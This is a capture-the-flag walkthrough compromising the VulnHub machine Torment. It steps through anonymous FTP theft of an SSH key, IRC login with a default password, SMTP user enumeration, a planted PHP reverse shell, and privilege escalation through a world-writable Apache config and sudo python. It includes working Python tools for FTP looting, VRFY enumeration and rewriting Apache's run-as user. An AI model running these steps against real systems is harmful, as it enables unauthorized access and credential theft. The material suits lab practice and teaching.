Monday, January 3, 2022



- Layout for this exercise:


- The goal of this exercise is to work through a complete compromise of the vulnerable machine Torment from the VulnHub pentesting platform.

- Torment can be downloaded from here:,299/

- Once Torment is downloaded and imported into VMware:


- netdiscover helps identify Torment's IP address:

- Scanning with Nmap shows a lot of open ports:

- Looking closer at port 21, the FTP server allows anonymous login:

- Connecting to the FTP server:

- Listing hidden entries as well, there are some interesting dot-directories:

- Most of the directories are empty, with the exception of .ngircd and .ssh.

- Downloading the file channels from .ngircd:

- Downloading the private key id_rsa from .ssh:

- Transfers are successful:

- Reading channels:

- Reading id_rsa:
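The FTP enumeration above, as an added example that is not part of the original write-up: a small Python client that logs in anonymously, lists with LIST -a so that dot-directories such as .ssh and .ngircd are not skipped, walks the tree and mirrors every readable file. The listing embedded in it is constructed (the file names other than the two hidden directories are invented), and the target host is whatever is passed on the command line.

```python
"""Anonymous FTP enumeration: recursive listing with hidden entries, then mirroring.

Added example; not part of the original write-up. Host, paths and the sample
listing below are constructed for illustration.
"""
import os
import posixpath
from ftplib import FTP, error_perm

# Constructed sample of Unix-style `LIST -a` output (not captured from Torment).
SAMPLE_LISTING = """total 16
drwxr-xr-x    5 ftp      ftp          4096 Feb 01  2019 .
drwxr-xr-x    5 ftp      ftp          4096 Feb 01  2019 ..
drwxr-xr-x    2 ftp      ftp          4096 Feb 01  2019 .ngircd
drwxr-xr-x    2 ftp      ftp          4096 Feb 01  2019 .ssh
-rw-r--r--    1 ftp      ftp          1675 Feb 01  2019 notes.txt
lrwxrwxrwx    1 ftp      ftp             9 Feb 01  2019 latest -> notes.txt""".splitlines()


def parse_list_line(line):
    """Parse one Unix-style LIST line into (kind, name).

    kind is 'd' (directory), 'l' (symlink) or '-' (regular file).  Returns
    None for '.', '..' and unparseable lines such as the 'total N' header.
    """
    parts = line.split(None, 8)
    if len(parts) < 9:
        return None
    kind, name = parts[0][0], parts[8]
    if kind == 'l':
        name = name.split(' -> ', 1)[0]   # drop the symlink target
    if name in ('.', '..'):
        return None
    return kind, name


def parse_listing(lines, base='/'):
    """Apply parse_list_line to a whole listing; returns [(full_path, kind), ...]."""
    entries = []
    for line in lines:
        parsed = parse_list_line(line)
        if parsed:
            kind, name = parsed
            entries.append((posixpath.join(base, name), kind))
    return entries


def hidden_dirs(entries):
    """Dot-directories (e.g. /.ssh, /.ngircd) that a plain `ls` would not show."""
    return [p for p, k in entries if k == 'd' and posixpath.basename(p).startswith('.')]


def walk_ftp(ftp, path='/', depth=0, max_depth=8):
    """Yield (path, kind) for everything below `path`, recursing into directories.

    `LIST -a` is not in RFC 959 but vsftpd, ProFTPD and pure-ftpd honour it;
    without -a most servers omit dot-entries, which is exactly the loot here.
    """
    lines = []
    ftp.retrlines('LIST -a ' + path, lines.append)
    for full, kind in parse_listing(lines, path):
        yield full, kind
        if kind == 'd' and depth < max_depth:
            yield from walk_ftp(ftp, full, depth + 1, max_depth)


def mirror_anonymous(host, root='/', dest='loot', port=21, timeout=10):
    """Anonymous login, then download every regular file under `root` into `dest`."""
    ftp = FTP()
    ftp.connect(host, port, timeout=timeout)
    ftp.login('anonymous', 'anonymous@')       # classic anonymous credentials
    fetched = []
    try:
        for path, kind in walk_ftp(ftp, root):
            if kind != '-':
                continue
            local = os.path.join(dest, path.lstrip('/'))
            os.makedirs(os.path.dirname(local), exist_ok=True)
            try:
                with open(local, 'wb') as fh:
                    ftp.retrbinary('RETR ' + path, fh.write)
                fetched.append(path)
            except error_perm as exc:          # unreadable file: keep going
                print(f'skip {path}: {exc}')
    finally:
        ftp.quit()
    return fetched


if __name__ == '__main__':
    import sys
    print(mirror_anonymous(sys.argv[1]))
```

The parsing helpers work on the constructed listing without a network, so the listing format handling can be checked before the script is pointed at a target; mirroring everything is noisier than the two manual get commands shown above, which is fine on a CTF box.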


- ngircd is an IRC server, and it is listening on port 6667:

- To talk to ngircd we can use the HexChat client:

- Installing HexChat:

- Launching HexChat:

- Adding a server named torment:

- Configuring torment with Torment's IP address and port 6667 (important: uncheck the option Accept invalid SSL certificates). The server password is ngircd's default, wealllikedebian:

- Connecting to server torment:

- Joining channel tormentedprinter:

- In the channel we find a password that will be needed later on:
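The exchange HexChat performs above, written out as an added example that is not part of the original write-up: a minimal raw-socket IRC client that sends PASS before NICK/USER, waits for RPL_WELCOME (001) before joining the channel, answers PING, and records the channel topic and messages. The host and nick are placeholders, and the server transcript embedded for offline replay is constructed (the topic text is invented).

```python
"""Minimal IRC client for a password-protected server such as ngircd.

Added example, not part of the original write-up; host, nick and the sample
server transcript are constructed.  Shows the wire exchange HexChat performs:
PASS before NICK/USER, JOIN only after RPL_WELCOME (001), PING answered.
"""
import socket


def registration_lines(password, nick):
    """Client-side registration. PASS must come before NICK/USER (RFC 2812 3.1)."""
    return [f'PASS {password}', f'NICK {nick}', f'USER {nick} 0 * :{nick}']


def parse_irc_line(line):
    """Split ':prefix COMMAND param1 param2 :trailing' into (prefix, command, params)."""
    prefix = None
    if line.startswith(':'):
        prefix, _, line = line[1:].partition(' ')
    trailing = None
    if ' :' in line:
        line, _, trailing = line.partition(' :')
    params = line.split()
    command = params.pop(0) if params else ''
    if trailing is not None:
        params.append(trailing)
    return prefix, command, params


def handle_server_line(line, state):
    """Update `state` from one server line; return a reply to send, or None."""
    prefix, command, params = parse_irc_line(line)
    if command == 'PING':                      # must answer or get disconnected
        return 'PONG :' + (params[-1] if params else '')
    if command == '001':                       # RPL_WELCOME: registered, now JOIN
        return 'JOIN ' + state['channel']
    if command == '464':                       # ERR_PASSWDMISMATCH: wrong PASS
        state['error'] = 'server password rejected'
    elif command == '332' and len(params) >= 3:   # RPL_TOPIC <nick> <channel> :<topic>
        state['topic'] = params[-1]
    elif command == '366':                     # RPL_ENDOFNAMES: join complete
        state['joined'] = True
    elif command == 'PRIVMSG' and len(params) >= 2:
        sender = prefix.split('!', 1)[0] if prefix else '?'
        state.setdefault('messages', []).append((sender, params[0], params[-1]))
    return None


def replay(server_lines, channel):
    """Feed a list of server lines through the handler offline; returns (state, replies)."""
    state = {'channel': channel}
    replies = []
    for line in server_lines:
        reply = handle_server_line(line, state)
        if reply:
            replies.append(reply)
    return state, replies


def read_channel(host, password, channel, nick='kali', port=6667, timeout=15):
    """Plain-TCP connection (ngircd's default 6667 is not TLS), join, return state."""
    state = {'channel': channel}
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(''.join(m + '\r\n' for m in registration_lines(password, nick)).encode())
        buf = b''
        while 'joined' not in state and 'error' not in state:
            chunk = sock.recv(4096)
            if not chunk:
                break
            buf += chunk
            while b'\r\n' in buf:
                raw, buf = buf.split(b'\r\n', 1)
                reply = handle_server_line(raw.decode(errors='replace'), state)
                if reply:
                    sock.sendall((reply + '\r\n').encode())
    return state


# Constructed server transcript (not captured from Torment) for offline replay.
SAMPLE_SERVER_LINES = [
    'PING :1234',
    ':irc.example 001 kali :Welcome to the Internet Relay Network kali!kali@10.0.0.5',
    ':irc.example 332 kali #tormentedprinter :constructed topic text',
    ':irc.example 353 kali = #tormentedprinter :kali',
    ':irc.example 366 kali #tormentedprinter :End of NAMES list',
]

if __name__ == '__main__':
    import sys
    print(read_channel(sys.argv[1], 'wealllikedebian', '#tormentedprinter'))
```

The client stops as soon as the join completes (366) or the password is rejected (464), so on a wrong password it fails immediately instead of hanging; to keep reading PRIVMSG traffic after the join, loop on recv until the channel goes quiet.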


- CUPS is a printing server, running on port 631:

- Connecting to the CUPS web interface on port 631:

- Clicking the Printers tab, we find a list of printers whose names look like usernames:

- Gathering all potential usernames:

- Msfconsole's SMTP user enumeration module, fed the username list in file u, confirms that patrick and qiu are real users on the box:

- patrick and qiu also appear on Torment's graphical login screen:
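What the SMTP enumeration step does on the wire, as an added example that is not part of the original write-up: VRFY each candidate name from the CUPS list and sort the replies. The host is a placeholder and the reply table used for offline replay is constructed. It also handles the caveat a practitioner hits with Postfix-style servers: a 252 reply does not confirm a user, so 252 is only meaningful when the same server rejects some other name with 550.

```python
"""SMTP VRFY user enumeration (what the Metasploit smtp_enum module automates).

Added example, not part of the original write-up; host and the constructed
reply table below are illustrative.
"""
import smtplib


def classify_vrfy(code):
    """Map a VRFY reply code to a verdict.

    250  -> 'valid'    the server confirms the mailbox
    252  -> 'accepted' cannot VRFY but would accept mail; not a confirmation
    55x  -> 'invalid'  rejected
    other-> 'unknown'  e.g. 502/500 when VRFY is disabled: nothing learned
    """
    if code == 250:
        return 'valid'
    if code == 252:
        return 'accepted'
    if code in (550, 551, 553):
        return 'invalid'
    return 'unknown'


def likely_users(verdicts):
    """Names worth trusting.

    'valid' always counts.  'accepted' (252) counts only if the server rejected
    at least one other name: a server that answers 252 to everything tells us
    nothing, one that answers 252 vs 550 is effectively confirming users.
    """
    rejects_some = any(v == 'invalid' for v in verdicts.values())
    return sorted(u for u, v in verdicts.items()
                  if v == 'valid' or (v == 'accepted' and rejects_some))


def replay_vrfy(replies):
    """Offline version of vrfy_users: `replies` maps user -> (code, message)."""
    return {u: classify_vrfy(code) for u, (code, _msg) in replies.items()}


def vrfy_users(host, candidates, port=25, timeout=10, helo='kali'):
    """Connect once, HELO, then VRFY each candidate; returns {user: verdict}."""
    verdicts = {}
    with smtplib.SMTP(host, port, timeout=timeout) as smtp:
        smtp.helo(helo)
        for user in candidates:
            code, _msg = smtp.verify(user)      # sends 'VRFY <user>'
            verdicts[user] = classify_vrfy(code)
    return verdicts


# Constructed reply tables (not captured from Torment).
SAMPLE_REPLIES = {                              # server distinguishes users
    'patrick': (252, '2.0.0 patrick'),
    'qiu': (252, '2.0.0 qiu'),
    'printer': (550, '5.1.1 <printer>: Recipient address rejected: User unknown'),
    'root': (250, '2.1.5 root'),
}
UNHELPFUL_REPLIES = {                           # server says 252 to everything
    'patrick': (252, '2.0.0 patrick'),
    'nobodyxyz': (252, '2.0.0 nobodyxyz'),
}

if __name__ == '__main__':
    import sys
    names = [line.strip() for line in open(sys.argv[2]) if line.strip()]
    print(likely_users(vrfy_users(sys.argv[1], names)))
```

Always include one obviously bogus name in the candidate list; it is the baseline that tells you whether the server's 252 replies carry any information at all.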

- SSH-ing in as patrick with id_rsa and the passphrase mostmachineshaveasupersercurekeyandalongpassphrase:

- patrick's sudo privileges are limited to poweroff and reboot through systemctl:


- Looking for files that are writable by all users, we find that Apache's main configuration file apache2.conf is world-writable:

- Setting the User directive in apache2.conf to qiu, so that Apache's worker processes will run as qiu the next time the service starts:
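The two steps above (finding world-writable files, then changing Apache's User directive), as an added example that is not part of the original write-up. The audit is the Python equivalent of find / -type f -perm -o+w, and the directive rewrite is what the attacker does to apache2.conf. The directory tree it builds is constructed in a temporary directory so it never touches a real /etc; the file contents imitate Debian's default User ${APACHE_RUN_USER} line.

```python
"""Privilege-escalation check: world-writable files and Apache's User directive.

Added example, not part of the original write-up.  The directory tree built by
build_demo_tree() is constructed; nothing here touches a real /etc.
"""
import os
import re
import stat
import tempfile

USER_DIRECTIVE = re.compile(r'^[ \t]*User[ \t]+(\S+)', re.MULTILINE)
PSEUDO_FS = ('/proc', '/sys', '/dev', '/run')


def world_writable_files(root):
    """Yield regular files under `root` with the o+w bit set (chmod o+w / 666 / 777).

    Equivalent to `find ROOT -type f -perm -o+w`; symlinks are not followed.
    """
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(PSEUDO_FS):
            dirnames[:] = []                    # don't descend into pseudo filesystems
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH:
                yield path


def apache_run_user(conf_text):
    """Effective value of the User directive (the last one wins), or None."""
    found = USER_DIRECTIVE.findall(conf_text)
    return found[-1] if found else None


def set_apache_run_user(conf_text, user):
    """Rewrite every User directive to `User <user>`, appending one if absent.

    This is the edit the attacker makes: Apache starts as root and then drops
    to this account, so whoever can write the file chooses the worker uid.
    """
    if USER_DIRECTIVE.search(conf_text):
        return USER_DIRECTIVE.sub(f'User {user}', conf_text)
    return conf_text.rstrip('\n') + f'\nUser {user}\n'


def build_demo_tree():
    """Constructed mini filesystem: one world-writable config, one with sane mode."""
    root = tempfile.mkdtemp(prefix='torment-demo-')
    etc = os.path.join(root, 'etc', 'apache2')
    os.makedirs(etc)
    bad = os.path.join(etc, 'apache2.conf')
    with open(bad, 'w') as fh:
        fh.write('# Debian default: user comes from /etc/apache2/envvars\n'
                 'User ${APACHE_RUN_USER}\nGroup ${APACHE_RUN_GROUP}\n')
    os.chmod(bad, 0o666)                        # the misconfiguration
    good = os.path.join(etc, 'ports.conf')
    with open(good, 'w') as fh:
        fh.write('Listen 80\n')
    os.chmod(good, 0o644)
    return root, bad


def audit(root):
    """{path: current User directive} for every world-writable .conf under root."""
    result = {}
    for path in world_writable_files(root):
        if path.endswith('.conf'):
            with open(path, errors='replace') as fh:
                result[path] = apache_run_user(fh.read())
    return result


if __name__ == '__main__':
    print(audit('/'))
```

Run as a low-privilege user, audit('/') reports exactly the files that user could weaponise; on the defensive side, a world-writable file under /etc is a finding on its own, regardless of which service reads it.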

- Now we take the PHP reverse shell php-reverse-shell.php, set our IP address and listening port in it, and save it as myshell.php:

- Setting a web server at Kali:

- Transferring myshell.php from Kali to Torment:

- Running systemctl reboot through sudo (allowed by patrick's sudo rule) restarts Apache with the modified configuration, so the apache2 processes now run as qiu:

- Setting a listener at port 1234:

- Requesting myshell.php through the web server:

- A reverse shell is triggered:

- Checking qiu's sudo privileges shows that /usr/bin/python can be run as root with no password:

- Using that sudo rule to spawn a shell from python gives us root:


- Reading proof.txt: